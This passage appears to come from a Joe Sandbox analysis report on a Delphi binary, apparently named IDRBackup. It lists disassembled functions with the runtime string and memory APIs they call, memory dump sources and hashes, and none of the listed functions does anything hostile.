                                                                                                  • Instruction Fuzzy Hash: 0741C830A097C15AF311EE7CD6A93AEBFD15F94240F948B1ED9DC87282DB79C8408352
                                                                                                  Function 5002CBD8 Relevance: 13.6, APIs: 9, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002CD41), ref: 5002CC29
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002CD41), ref: 5002CC52
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002CD41), ref: 5002CCA7
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002CD41), ref: 5002CCB9
                                                                                                  • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(00000000,5002CD41), ref: 5002CCC5
                                                                                                  • @Sysutils@TStringBuilder@_Replace$qqrix20System@UnicodeStringt2.RTL120(?,00000000,5002CD41), ref: 5002CCDA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@Unicode$System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Builder@_Char$qqrx20Comp$qqrpxbt1uiReplace$qqrix20Stringt2
                                                                                                  • String ID:
                                                                                                  • API String ID: 1607367926-0
                                                                                                  • Opcode ID: dff76c2313e9b10604c8c371fb3469098b1b02ec0f466d374c6a1fd6b8e53afd
                                                                                                  • Instruction ID: aca0b5ef864c04f24fc7a5c9ba3459030470bcc1760272ceb3d3fd660aa6f22d
                                                                                                  • Opcode Fuzzy Hash: dff76c2313e9b10604c8c371fb3469098b1b02ec0f466d374c6a1fd6b8e53afd
                                                                                                  • Instruction Fuzzy Hash: 0551F874E0124ADFDF10DFA8D9819AEBBF5EF48210B6081A6E944E7315D734EE42CB90
                                                                                                  Function 5000B174 Relevance: 13.6, APIs: 9, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1A3
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1F5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B209
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B2A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Move$qqrpxvpviSystem@@Unicode$Asg$qqrpvpxvAsg$qqrr20StringStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 3030236992-0
                                                                                                  • Opcode ID: 970a367cf088cdf98191689e9a0694ce909863f07a89907442e7d6dacbf600a3
                                                                                                  • Instruction ID: 633908d8e5bc59ccb80292a96c5d98a609424162179242e37904b4a32d27729b
                                                                                                  • Opcode Fuzzy Hash: 970a367cf088cdf98191689e9a0694ce909863f07a89907442e7d6dacbf600a3
                                                                                                  • Instruction Fuzzy Hash: 1031E5713044858FE724FFA8DCB2B9AB392AF85304FE4876AD205CB357DA34D8528780
                                                                                                  Function 5000A5A8 Relevance: 13.6, APIs: 9, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A5E7
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A614
                                                                                                  • @System@@IntOver$qqrv.RTL120(?,00000000,5000A6C6), ref: 5000A651
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000A6C6), ref: 5000A65B
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A67E
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A695
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A6AB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$Unicode$AnsiFromMove$qqrpxvpviStr$qqrr20StringStringx27System@%T$us$i0$%$Internal$Length$qqrr20Over$qqrvStringi
                                                                                                  • String ID:
                                                                                                  • API String ID: 1011950963-0
                                                                                                  • Opcode ID: e4b13b3abff3123872844c1e8fe38d4b4ae3526ff4051b82554457186b164d06
                                                                                                  • Instruction ID: 9ab0ed15de96328d0360d8f2b957ce8da5d90d071b8904a8a405cde8eb91594d
                                                                                                  • Opcode Fuzzy Hash: e4b13b3abff3123872844c1e8fe38d4b4ae3526ff4051b82554457186b164d06
                                                                                                  • Instruction Fuzzy Hash: 7A418D30A015A9DFEF10DFA8D8A099DB7F5EF46304B9542A6D500D7315DB31EE45CB80
                                                                                                  Function 5001ACD4 Relevance: 13.6, APIs: 9, Instructions: 103COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001ADED), ref: 5001ACFD
                                                                                                  • @Sysutils@AnsiExtractQuotedStr$qqrrpbb.RTL120(00000000,5001ADED), ref: 5001AD0C
                                                                                                    • Part of subcall function 5001AB98: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,?,5001AD11,00000000,5001ADED), ref: 5001ABA9
                                                                                                    • Part of subcall function 5001AB98: @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001ABD0
                                                                                                    • Part of subcall function 5001AB98: @Sysutils@StrEnd$qqrpxb.RTL120 ref: 5001ABFE
                                                                                                    • Part of subcall function 5001AB98: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001AC30
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001AD37
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001AD6E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001AD94
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001ADB3
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001ADED), ref: 5001ADD2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$Ansi$From$InternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$Asg$qqrr20Stringx20$CharChar$qqrx20End$qqrpxbExtractLen$qqrr20QuotedScan$qqrpbbStr$qqrrpbbStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 4150118406-0
                                                                                                  • Opcode ID: 7b8b3bd956a24fb37043db0de1cd875b4586c0c9a660db8d41d02f380f970555
                                                                                                  • Instruction ID: 878662552be2a9cceb873cca4a38ac5847e1d6f413897114a0aea2408ea04795
                                                                                                  • Opcode Fuzzy Hash: 7b8b3bd956a24fb37043db0de1cd875b4586c0c9a660db8d41d02f380f970555
                                                                                                  • Instruction Fuzzy Hash: FB31C530A00699DFDF12DFA8ED425ADB3F5EF46200BA042A2E502D7A55EB30DF81D744
                                                                                                  Function 50011C94 Relevance: 13.6, APIs: 9, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011D9A), ref: 50011CBB
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011D9A), ref: 50011CC6
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011D9A), ref: 50011CE3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011D9A), ref: 50011D1B
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011D9A), ref: 50011D4C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011D9A), ref: 50011D51
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011D9A), ref: 50011D6E
                                                                                                  • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120(00000000,50011D9A), ref: 50011D78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Character@Stringx20$Except$qqrvException@$bctr$qqrp20FreeHighMem$qqrpvRaiseRecpx14RecxiSurrogate$qqrbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 548731262-0
                                                                                                  • Opcode ID: 4d4eef9b03f393715acc3e42fdb6e366bf52ca2bdebe8caac90d3fc4a567f435
                                                                                                  • Instruction ID: 700245c2fe1d1fdb6a485c05ca2023c3c128d6a71b5f8303525b4329a6adc132
                                                                                                  • Opcode Fuzzy Hash: 4d4eef9b03f393715acc3e42fdb6e366bf52ca2bdebe8caac90d3fc4a567f435
                                                                                                  • Instruction Fuzzy Hash: BC318F30A00299ABDF15DFA4EC919EEB7FAEF44300F5442A6E940E7251E770DE82C791
                                                                                                  Function 50011278 Relevance: 13.6, APIs: 9, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001137A), ref: 500112A6
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112C3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112FB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001137A), ref: 5001132C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001137A), ref: 50011331
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 5001134E
                                                                                                  • @Character@TCharacter@IsSurrogate$qqrb.RTL120(00000000,5001137A), ref: 50011358
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStringx20Surrogate$qqrbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2718466752-0
                                                                                                  • Opcode ID: bad0fc59ee02269015429073d0d42a0ebfc6cb78c8723bc27d63799decc90d51
                                                                                                  • Instruction ID: 810eb6f4f35f56be61290b59cfeeda25cb95dca07b352be7eb4c63e5f55842af
                                                                                                  • Opcode Fuzzy Hash: bad0fc59ee02269015429073d0d42a0ebfc6cb78c8723bc27d63799decc90d51
                                                                                                  • Instruction Fuzzy Hash: FC315830A042899BDF15DFA4EC81AEEB7F9EF44200F5442A6E940E7655E7709E81C790
                                                                                                  Function 50010940 Relevance: 13.6, APIs: 9, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010A42), ref: 5001096E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 5001098B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 500109C3
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010A42), ref: 500109F4
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010A42), ref: 500109F9
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 50010A16
                                                                                                  • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120(00000000,50010A42), ref: 50010A20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20HighRaiseRecpx14RecxiStringx20Surrogate$qqrbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 4039923113-0
                                                                                                  • Opcode ID: 43317869d6c1f8e73e51e660adce439b81015dec9d7cb8a377cee6d1af779c79
                                                                                                  • Instruction ID: 0537749609d4c2c7f5846f453ae597f4d5af8c2bbe5069fb687463282a70f4ee
                                                                                                  • Opcode Fuzzy Hash: 43317869d6c1f8e73e51e660adce439b81015dec9d7cb8a377cee6d1af779c79
                                                                                                  • Instruction Fuzzy Hash: 63316F30A002999FEF11DFA8DC915AEB7F5EF44304F9046A6E980E7252E7B09E81C791
                                                                                                  Function 5000FB90 Relevance: 13.6, APIs: 9, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000FC92), ref: 5000FBBE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FC92), ref: 5000FBDB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FC92), ref: 5000FC13
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5000FC92), ref: 5000FC44
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5000FC92), ref: 5000FC49
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FC92), ref: 5000FC66
                                                                                                  • @Character@TCharacter@IsLetter$qqrb.RTL120(00000000,5000FC92), ref: 5000FC70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20Letter$qqrbRaiseRecpx14RecxiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 116701318-0
                                                                                                  • Opcode ID: 0ab13f2dd6dd5c675b01cb9593c8161319786f04545f7858dcf4f9daa7e03c78
                                                                                                  • Instruction ID: 0cff3b4b0113612aababc7cf32eb9127b6015ad67c45bd92dacf89e969f5d904
                                                                                                  • Opcode Fuzzy Hash: 0ab13f2dd6dd5c675b01cb9593c8161319786f04545f7858dcf4f9daa7e03c78
                                                                                                  • Instruction Fuzzy Hash: 66316E30A042899BFB11DFA4D9A39BDB7F5EF44300F9042A6E900D7651E7709F45DB90
                                                                                                  Function 50010C34 Relevance: 13.6, APIs: 9, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010D36), ref: 50010C62
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010D36), ref: 50010C7F
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010D36), ref: 50010CB7
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010D36), ref: 50010CE8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010D36), ref: 50010CED
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010D36), ref: 50010D0A
                                                                                                  • @Character@TCharacter@IsLowSurrogate$qqrb.RTL120(00000000,50010D36), ref: 50010D14
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
